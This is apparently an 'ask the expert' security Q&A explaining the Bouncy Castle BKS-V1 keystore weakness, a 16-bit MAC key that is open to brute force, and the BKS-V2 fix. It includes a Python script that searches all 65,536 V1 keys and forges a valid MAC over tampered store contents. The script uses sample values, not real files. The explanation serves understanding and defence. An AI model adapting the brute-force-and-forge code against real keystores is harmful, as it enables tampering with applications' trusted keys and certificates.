Bouncy Castle is a collection of cryptographic APIs for Java and C#, but it was recently reported that some of the Bouncy Castle keystore files are vulnerable to hash collisions, which enable attackers to use brute force attacks to crack the cryptography behind C# and Java applications. How is this possible? What solutions has Bouncy Castle suggested?
The brute force attack is possible because of a design flaw in the first version of the Bouncy Castle keystore format (BKS-V1), the file in which Bouncy Castle stores private keys and certificates for Java and C# applications. The contents of a BKS file are protected by a message authentication code (MAC) whose key is derived from the keystore password. BKS-V1 derives a MAC key that is far too short to resist exhaustive search, so an attacker does not need to guess the password at all: trying every possible MAC key is enough to forge the MAC, and many unrelated passwords derive the same short key, so the password check itself accepts wrong passwords. That is the "hash collision" in the report.
BKS computes its MAC with HMAC-SHA1, and the SHA-1 output is 160 bits. RFC 7292 (PKCS #12), which defines the password-based key derivation that BKS uses, specifies that the MAC key length must equal the hash output length, so a 160-bit key is required. BKS-V1 does not meet this requirement because it derives a MAC key of only 16 bits (two bytes). The cause is a unit mix-up in the store code: the MAC size in bytes (20) was passed where a size in bits was expected, leaving 20/8 = 2 bytes of key material.
A 16-bit key has only 65,536 (2^16) possible values. A short script that computes HMAC-SHA1 over the stored data with each candidate key and compares the result with the MAC stored in the file recovers the key in a fraction of a second on ordinary hardware, with no knowledge of the password. With the key in hand, the attacker can modify the keystore contents (for example, add a trusted certificate or swap a key entry) and recompute a valid MAC, so the application's own integrity check still passes when it opens the store with the real password. Conversely, because only 65,536 distinct MAC keys exist, roughly one in every 65,536 candidate passwords derives the same key as the real one and is accepted by the check, however long the real password is.
A CERT Coordination Center blogger at Carnegie Mellon University demonstrated the attack with a short brute force script, crackbks.py, written in Python on top of the pyjks library, which can read BKS files. Run against a BKS-V1 keystore, the script produced a password that the keystore accepted as valid without the real password ever having been supplied, confirming that the effective strength of BKS-V1 password protection is 16 bits, the size of the MAC key, regardless of the length of the password itself.
Bouncy Castle's fix shipped in release 1.47: the BKS format was revised (BKS-V2) so that the MAC key derived from the password is the full 160 bits required by RFC 7292, and this is the format written by default under the "BKS" keystore type in Bouncy Castle 1.47 and later. Existing BKS-V1 files should be opened with a current provider and saved again so they gain the longer MAC key; the old format remains available under the "BKS-V1" type name only for compatibility and should not be used for new stores.
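The following Python script is an added illustration written for this answer; it is not Bouncy Castle's code and not the CERT/CC crackbks.py script, and it does not parse real BKS files. It implements the RFC 7292 Appendix B key derivation with SHA-1, derives the HMAC key at the BKS-V1 length (16 bits) and at the BKS-V2 length (160 bits), recovers the V1 key by trying all 65,536 values, and forges a MAC over tampered store contents that the owner's real password then accepts, while the same search fails against a V2 MAC. The salt, iteration count, password and store body are constructed sample values, and the way the V1 key is shortened (a byte count passed where a bit count was expected) is the editor's reading of the Bouncy Castle store code, stated here as an assumption.

```python
import hashlib
import hmac

MAC_MATERIAL = 3  # RFC 7292 B.3: ID byte used when deriving MAC key material


def pkcs12_password_bytes(password: str) -> bytes:
    """BMPString form used by PKCS #12: UTF-16BE plus a two-byte null terminator."""
    return password.encode("utf-16-be") + b"\x00\x00" if password else b""


def pkcs12_kdf(password: str, salt: bytes, iterations: int, id_byte: int, n: int) -> bytes:
    """RFC 7292 Appendix B.2 key derivation with SHA-1 (u = 20, v = 64 bytes)."""
    u, v = 20, 64
    D = bytes([id_byte]) * v

    def expand(b: bytes) -> bytes:
        # Repeat b up to the next multiple of v bytes; an empty input stays empty.
        if not b:
            return b""
        blocks = -(-len(b) // v)
        return (b * (blocks * v // len(b) + 1))[: blocks * v]

    I = bytearray(expand(salt) + expand(pkcs12_password_bytes(password)))
    out = b""
    for _ in range(-(-n // u)):
        A = hashlib.sha1(D + bytes(I)).digest()
        for _ in range(iterations - 1):
            A = hashlib.sha1(A).digest()
        B = int.from_bytes((A * (v // u + 1))[:v], "big") + 1
        for j in range(0, len(I), v):  # I_j = (I_j + B + 1) mod 2^(8v)
            block = int.from_bytes(I[j:j + v], "big")
            I[j:j + v] = ((block + B) % (1 << (8 * v))).to_bytes(v, "big")
        out += A
    return out[:n]


def bks_mac_key(password: str, salt: bytes, iterations: int, version: int) -> bytes:
    """Derive the HMAC-SHA1 key the way BKS-V1 (2 bytes) and BKS-V2 (20 bytes) do.

    Assumption: V1 passed the MAC size in bytes (20) where bits were expected,
    so only 20 // 8 = 2 bytes of derived key material survived.
    """
    key_bytes = 20 // 8 if version == 1 else 20
    return pkcs12_kdf(password, salt, iterations, MAC_MATERIAL, key_bytes)


def store_mac(key: bytes, body: bytes) -> bytes:
    """HMAC-SHA1 over the serialized store contents."""
    return hmac.new(key, body, hashlib.sha1).digest()


def mac_is_valid(password, salt, iterations, version, body, mac) -> bool:
    """What the application does on load: derive the key from its password, check the MAC."""
    key = bks_mac_key(password, salt, iterations, version)
    return hmac.compare_digest(store_mac(key, body), mac)


def recover_v1_key(body: bytes, mac: bytes):
    """Try every one of the 2**16 possible BKS-V1 MAC keys; no password needed."""
    for k in range(1 << 16):
        key = k.to_bytes(2, "big")
        if hmac.compare_digest(store_mac(key, body), mac):
            return key
    return None


def forge_tampered_store(body: bytes, mac: bytes, tampered_body: bytes):
    """Recover the V1 key from (body, mac) and return a valid MAC for tampered_body."""
    key = recover_v1_key(body, mac)
    return None if key is None else store_mac(key, tampered_body)


# Constructed sample values (not taken from a real keystore file).
SALT = bytes(range(20))
ITERATIONS = 1024
PASSWORD = "correct horse battery staple"
BODY = b"BKS entry: alias=server, type=PrivateKeyEntry, cert=CN=example.com"
TAMPERED = b"BKS entry: alias=server, type=PrivateKeyEntry, cert=CN=attacker.example"


if __name__ == "__main__":
    mac1 = store_mac(bks_mac_key(PASSWORD, SALT, ITERATIONS, 1), BODY)
    forged = forge_tampered_store(BODY, mac1, TAMPERED)
    print("BKS-V1: tampered store accepted with the real password:",
          mac_is_valid(PASSWORD, SALT, ITERATIONS, 1, TAMPERED, forged))
    mac2 = store_mac(bks_mac_key(PASSWORD, SALT, ITERATIONS, 2), BODY)
    print("BKS-V2: 16-bit search recovers a key:", recover_v1_key(BODY, mac2) is not None)
```

Two details are worth noticing. The V1 key is simply the first two bytes of the V2 key, because the derivation is identical and only the requested length differs, which is why the fix needed nothing more than the correct key length. And the search in recover_v1_key never touches the password: it attacks the integrity of the file directly, so a long, high-entropy keystore password does not help a BKS-V1 store.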
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)